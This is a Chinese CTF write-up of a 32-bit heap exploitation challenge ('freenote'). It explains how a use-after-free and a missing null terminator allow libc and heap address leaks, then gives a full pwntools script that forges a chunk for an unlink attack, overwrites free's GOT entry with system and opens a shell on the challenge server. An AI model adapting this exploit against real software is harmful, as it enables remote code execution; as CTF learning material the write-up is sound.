终于做完了自己在pwn方向的第一道堆题,参考了writeup1和writeup2怼了四天,终于理解了整道题目,本地调通了,但是题目服务器貌似有点问题,题目提供的libc偏移对不上,远程没有调通
整体思路
- 泄露出libc的基址和heap的地址
- 根据泄露的libc基址算出system函数的基址
- 伪造chunk,free掉伪造的chunk触发unlink,使得可以任意地址写
- 劫持got表中的free为system函数地址,调用删除功能,getshell
具体分析
首先查看程序功能:
== Blue-lotus Free Note ==
1. List Note
2. New Note
3. Edit Note
4. Delete Note
5. Exit
====================
Your choice:
再拖入IDA看一下逻辑。找到可以利用的地方:
- 程序一开始malloc一个3096大小的堆用来管理之后创建的note
- delete功能在free之后没有将指针置空,可以进行利用
- 在new note的时候,尾部没有加上\x00,可以用来进行地址泄露
- 在new note的时候,有逻辑判断让malloc的chunk至少为136大小,属于small chunk的范畴,可以使用unlink
地址泄露
libc地址泄露的具体原理为:
- 由于在写入的时候没有加上\x00,所以在输出的时候可以也一直输出到之后的\x00为止。
- 当chunk被free掉后fd和bk指针会的值为<main_arena+offset>,而<main_arena+offset>与libc加载地址的相对偏移是固定的。所以只需要泄露出<main_arena+offset>,再在本地调试找到算出libc和main_arena的偏移,便能知道libc的基址
- 最终操作为:创建两个note(chunk)(防止top chunk的合并)=>free掉第一个=>再创建note(这时候申请的chunk的大小要与free掉的一致才能申请到原来的空间,且输入的大小不能超过四个字节,否则会覆盖地址信息)=>list note拿到地址信息
heap地址泄露的原理为:当两个不相邻的chunk被free掉时,会至于bin的链表中,本例中会先放到unsorted bin中,这时chunk的fd和bk中存有chunk的地址信息,接下来操作同上文则可泄露heap地址。
unlink
程序在最开始的时候,申请了一个堆作为note的管理,可以看到里面存储了note的地址,所以通过unlink伪造chunk的方式可以取得该区的控制权,从而能任意地址写,劫持got表。需要注意的是伪造chunk的大小要地址对齐。
exp
from pwn import *
context.log_level = 'debug'
#p = process('./freenote_x86')
#libc = ELF('./libc-2.19.so')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./freenote_x86')
p = remote('pwn2.jarvisoj.com',9885)
def newNote(length, content):
p.recvuntil('Your choice: ')
p.sendline('2')
p.recvuntil('Length of new note: ')
p.sendline(str(length))
p.recvuntil('Enter your note: ')
p.send(content)
sleep(0.2)
def deleteNote(number):
p.recvuntil('Your choice: ')
p.sendline('4')
p.recvuntil('Note number: ')
p.sendline(str(number))
def editNote(number, length, content):
p.recvuntil('Your choice: ')
p.sendline('3')
p.recvuntil('Note number: ')
p.sendline(str(number))
p.recvuntil('Length of note: ')
p.sendline(str(length))
p.recvuntil('Enter your note: ')
p.sendline(content)
def listNote():
p.recvuntil('Your choice: ')
p.sendline('1')
if __name__ == '__main__':
# ======================================== leak libc address
offset = 0x1b27b0 # main to libc
newNote(7,'a'*7) # 0
sleep(0.2)
newNote(7,'b'*7) # 1
sleep(0.2)
deleteNote(0)
newNote(1,'0')
listNote()
sleep(0.2)
p.recv(7)
main_addr = u32(p.recv(4))
libc_addr = main_addr - offset
system_addr = libc_addr + libc.symbols['system']
print 'leak address:%x'%main_addr
print 'libc address:%x'%libc_addr
# ========================================= leak heap address
newNote(7,'c'*7) # 2
newNote(7,'d'*7) # 3
deleteNote(0)
deleteNote(2)
newNote(1,'0')
listNote()
sleep(0.2)
p.recv(7)
heap_base = u32(p.recv(4))-0xd28
print 'heap address:%x'%heap_base
deleteNote(0)
deleteNote(1)
deleteNote(3)
# ========================================= unlink
payload = p32(0)+p32(0x81)+p32(heap_base+0x18-12)+p32(heap_base+0x18-8)# fakechunk1: prev_size size fd bk fill_data 0x88
payload = payload.ljust(0x80,'a')
payload += p32(0x80)+p32(0x80) # fakechunk2: prev_size size fd-data
payload = payload.ljust(0x80*2,'a')
newNote(len(payload),payload)
sleep(0.2)
deleteNote(1)
# ========================================= hijack got
payload2 = p32(2)+p32(1)+p32(4)+p32(elf.got['free'])+p32(1)+p32(8)+p32(heap_base+0xca8)
payload2 = payload2.ljust(0x80*2,'\x00')
editNote(0,len(payload2),payload2)
editNote(0,4,p32(system_addr))
editNote(1,8,'/bin/sh\x00')
print 'system address:%x'%system_addr
# gdb.attach(p)
deleteNote(1)
p.interactive()
